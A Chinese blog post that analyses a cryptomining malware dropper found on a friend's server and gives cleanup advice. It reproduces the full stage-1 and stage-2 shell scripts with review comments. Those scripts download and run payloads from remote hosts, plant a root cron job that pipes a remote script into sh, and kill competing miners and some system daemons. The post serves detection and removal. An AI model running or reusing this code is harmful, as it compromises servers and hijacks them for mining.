今天,群里有朋友@我,说服务器中病毒了,让帮忙检查一下下面的脚本。自己对 shell 脚本类的病毒还是很感兴趣的,于是就分析了一下这个脚本。
#!/bin/bash
# Stage-1 dropper exactly as posted; only the lost line breaks have been
# restored and review comments added.  It contains no exploit and no
# privilege escalation: it only checks whether it is running as root and
# then fetches and starts a second-stage script from abcde.sw5y.com into
# /tmp.  Two branches, same fetch pattern, different payload and the
# root branch additionally installs a cron job.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
#chmod +x /tmp/hawk && ps auxf | grep -v grep | grep hawk || nohup /tmp/hawk >/dev/null 2>&1 &
# Removes /tmp/config.txt; why is not evident from this script.
rm -rf /tmp/config.txt
# The `${var}x != "root"x` form is the old idiom for a string comparison
# that survives an empty value.  The only thing decided here is root or
# not root.
whoami=$( whoami )
if [ ${whoami}x != "root"x ];then
# Non-root branch.  curl runs unconditionally; the `! -f /tmp/lower.sh`
# test below does NOT gate the download (the write-up reads it that way),
# it is only a wget fallback for the case where curl left no file.  wget
# saves under the remote name, hence the second chmod/nohup for
# /tmp/lowerv2.sh.  Both files are made world-writable (777) and started
# detached with output discarded.
# Artefacts to look for: /tmp/lower.sh, /tmp/lowerv2.sh.
curl http://abcde.sw5y.com/l2/lowerv2.sh > /tmp/lower.sh
chmod 777 /tmp/lower.sh
nohup bash /tmp/lower.sh >/dev/null 2>&1 &
if [ ! -f "/tmp/lower.sh" ] ;then
wget -P /tmp/ http://abcde.sw5y.com/l2/lowerv2.sh
rm /tmp/lower.sh.*
rm /tmp/lowerv2.sh.*
fi
chmod 777 /tmp/lowerv2.sh
nohup bash /tmp/lowerv2.sh >/dev/null 2>&1 &
else
# Root branch.  Persistence: the root crontab is overwritten (`>`, not
# appended) in both crontab spool locations with a job that pipes a
# remote script into sh every 5 minutes.  Cleanup must remove BOTH
# files, otherwise the whole chain is re-fetched within 5 minutes.
# The cron line itself (`curl -sL ... | sh`) is the simplest detection
# signature on this page.
echo "*/5 * * * * curl -sL http://x.co/6nPMR | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -sL http://x.co/6nPMR | sh" > /var/spool/cron/crontabs/root
# Same fetch / wget-fallback pattern as above, for rootv2.sh (analysed
# further down the page).  Artefacts: /tmp/root.sh, /tmp/rootv2.sh.
curl http://abcde.sw5y.com/l2/rootv2.sh > /tmp/root.sh
chmod 777 /tmp/root.sh
nohup bash /tmp/root.sh>/dev/null 2>&1 &
if [ ! -f "/tmp/root.sh" ] ;then
wget -P /tmp/ http://abcde.sw5y.com/l2/rootv2.sh
rm /tmp/root.sh.*
rm /tmp/rootv2.sh.*
fi
chmod 777 /tmp/rootv2.sh
nohup bash /tmp/rootv2.sh >/dev/null 2>&1 &
fi
这个脚本大抵分析下,无非是判定用户不为空不是root的话,且假如不存在/tmp/lower.sh文件就下载运行。假如是root用户,就写crontab筹划使命每5分钟下载一次脚本。并将脚本重定向到/tmp/root.sh下实行。
那么这个被反复强调要下载的 rootv2.sh 是什么内容呢?
#!/bin/bash
# Stage-2 script (rootv2.sh) exactly as posted; only the lost line breaks
# have been restored and review comments added.  Structure: kills()
# terminates competing miners and deletes their files, downloadyam()
# fetches and (re)starts this operator's own payloads, and the loop at
# the bottom repeats both every 600 s, i.e. every 10 minutes (the
# write-up's "once an hour" does not match the sleep value).
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#######################################
# Terminate competing miners and remove their files.
# Matching is by process name (pkill -f), by mining-pool address or path
# in the command line (ps|grep|awk|xargs kill -9), by a jenkins-related
# command-line shape, and by TCP port (lsof on 3333/5555/7777/14444).
# Caution for anyone tempted to reuse this as a cleanup routine (the
# write-up suggests running the script without downloadyam): `pkill -f`
# matches the whole command line as a substring, so `pkill -f polkitd`,
# `pkill -f acpid`, `pkill -f irqbalance` and `pkill -f conns` also kill
# the genuine system daemons of those names and anything whose arguments
# contain those strings.  Unexplained deaths of those daemons are a
# detection hint for this family.
# Globals:   PORT_NUMBER (written)
# Returns:   status of the last xargs kill; nothing is error-checked
#######################################
function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
pkill -f AnXqV.yam
# Kill by pool address found in the process command line.
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
# Processes under a jenkins path with a "-c" argument, and anything whose
# command line looks like "./<digits> -c".
ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
ps ax|grep -o './[0-9]* -c'| xargs pkill -f
# Kill by name.  Several entries (polkitd, acpid, irqbalance, conns) are
# also names of legitimate daemons — see the function header.
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
# File names here overlap with the process names killed above (irq.sh,
# irqbalanc1, conn, conns); presumably other variants of the same kind —
# not verifiable from this script.
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
# Kill whatever holds the usual miner/pool ports; `NR!=1` skips lsof's
# header line.
PORT_NUMBER=3333
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=5555
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=7777
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=14444
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
}
#######################################
# Fetch and (re)start the payloads.
# Per artefact the pattern is: curl to /tmp, wget into /tmp as fallback
# if the file is still missing, chmod +x, then — for the executables —
# count matching processes with `ps aux | grep <name> | grep -v grep |
# wc -l`: 0 → start detached with nohup, 1 → just echo the name, any
# other count → do nothing.  bashe (with pools.txt) is fetched only when
# bashd is still not running 15 s after the first attempt; Xagent is
# fetched unconditionally after another 15 s.  The `-p bashd` and
# `-C /tmp/pools.txt` options belong to the fetched binaries; their
# meaning cannot be determined from this script.
# Artefacts to remove during cleanup: /tmp/config.json /tmp/bashd
# /tmp/pools.txt /tmp/bashe /tmp/Xagent (all chmod +x, even the two data
# files).  Remote sources: abcde.sw5y.com (/l2/) and
# xmr.enjoytopic.tk (/l3/).  Note the `rm -rf <name>.*` lines use
# relative paths, which only work because main does `cd /tmp/` first.
# Globals:   p (written)
# Outputs:   echoes the payload name when it is already running
#######################################
function downloadyam() {
  if [ ! -f "/tmp/config.json" ]; then
    curl http://abcde.sw5y.com/l2/config.json -o /tmp/config.json && chmod +x /tmp/config.json
    if [ ! -f "/tmp/config.json" ]; then
      wget http://abcde.sw5y.com/l2/config.json -P /tmp && chmod +x /tmp/config.json
      rm -rf config.json.*
    fi
  fi
  if [ ! -f "/tmp/bashd" ]; then
    curl http://abcde.sw5y.com/l2/bashd -o /tmp/bashd && chmod +x /tmp/bashd
    if [ ! -f "/tmp/bashd" ]; then
      wget http://abcde.sw5y.com/l2/bashd -P /tmp && chmod +x /tmp/bashd
      rm -rf bashd.*
    fi
    nohup /tmp/bashd -p bashd>/dev/null 2>&1 &
  else
    p=$(ps aux | grep bashd | grep -v grep | wc -l)
    if [ ${p} -eq 1 ];then
      echo "bashd"
    elif [ ${p} -eq 0 ];then
      #nohup /tmp/bashd -p $(hostname)>/dev/null 2>&1 &
      nohup /tmp/bashd -p bashd>/dev/null 2>&1 &
    else
      echo ""
    fi
  fi
  # Second check after a grace period; bashe is the fallback payload.
  sleep 15
  p=$(ps aux | grep bashd | grep -v grep | wc -l)
  if [ ${p} -eq 1 ];then
    echo "bashd"
  elif [ ${p} -eq 0 ];then
    if [ ! -f "/tmp/pools.txt" ]; then
      curl http://abcde.sw5y.com/l2/pools.txt -o /tmp/pools.txt && chmod +x /tmp/pools.txt
      if [ ! -f "/tmp/pools.txt" ]; then
        wget http://abcde.sw5y.com/l2/pools.txt -P /tmp && chmod +x /tmp/pools.txt
        rm -rf pools.txt.*
      fi
    fi
    if [ ! -f "/tmp/bashe" ]; then
      curl http://abcde.sw5y.com/l2/bashe -o /tmp/bashe && chmod +x /tmp/bashe
      if [ ! -f "/tmp/bashe" ]; then
        wget http://abcde.sw5y.com/l2/bashe -P /tmp && chmod +x /tmp/bashe
        rm -rf bashe.*
      fi
      nohup /tmp/bashe -C /tmp/pools.txt>/dev/null 2>&1 &
    else
      p=$(ps aux | grep bashe | grep -v grep | wc -l)
      if [ ${p} -eq 1 ];then
        echo "bashe"
      elif [ ${p} -eq 0 ];then
        nohup /tmp/bashe -C /tmp/pools.txt>/dev/null 2>&1 &
      else
        echo ""
      fi
    fi
  else
    echo ""
  fi
  # Third component comes from a different host than the other four.
  sleep 15
  if [ ! -f "/tmp/Xagent" ]; then
    curl http://xmr.enjoytopic.tk/l3/Xagent -o /tmp/Xagent && chmod +x /tmp/Xagent
    if [ ! -f "/tmp/Xagent" ]; then
      wget http://xmr.enjoytopic.tk/l3/Xagent -P /tmp && chmod +x /tmp/Xagent
      rm -rf Xagent.*
    fi
    nohup /tmp/Xagent >/dev/null 2>&1 &
  else
    p=$(ps aux | grep Xagent | grep -v grep | wc -l)
    if [ ${p} -eq 1 ];then
      echo "Xagent"
    elif [ ${p} -eq 0 ];then
      nohup /tmp/Xagent >/dev/null 2>&1 &
    else
      echo ""
    fi
  fi
}
# Main loop.  `[ 1 ]` tests a non-empty string and is therefore always
# true, so the script never exits on its own: during cleanup the running
# `bash /tmp/root.sh` / `rootv2.sh` process has to be stopped before the
# files are removed, and the cron job from the stage-1 script has to go
# as well, or it is all re-fetched.
cd /tmp/
while [ 1 ]
do
  kills
  downloadyam
  sleep 600
done
这个脚本大抵看了下,一个kills函数和downloadyam函数,kills函数是删除各种服务,脚本。不看不知道,原来他还会下载这么多东西啊。关键是downloadyam函数,满满的都是各种恶意。一小时实行一遍删除然后下载,是为了什么呢?
分析结果
这个脚本很简单,防范方法是:它会在 /tmp/ 目录下创建 lower.sh 及 rootv2.sh 脚本,先将第一个脚本删除;再修改第二个脚本的 while 循环处,将对 downloadyam 函数的调用删除。同时必须清除它以 root 身份写入 /var/spool/cron/root 和 /var/spool/cron/crontabs/root 的每 5 分钟执行一次的定时任务,以及 /tmp 下被下载的 config.json、bashd、pools.txt、bashe、Xagent 等文件,否则这些脚本会被重新下载。
如果已经中了病毒,那么执行删除了 downloadyam 函数调用的脚本就可以清除病毒。注意 kills 函数里的 pkill -f polkitd、pkill -f acpid、pkill -f irqbalance 也会杀掉同名的正常系统守护进程,这样使用前应先把这几行去掉。
来源:付生保个人博客
很想加人你们,等我发工资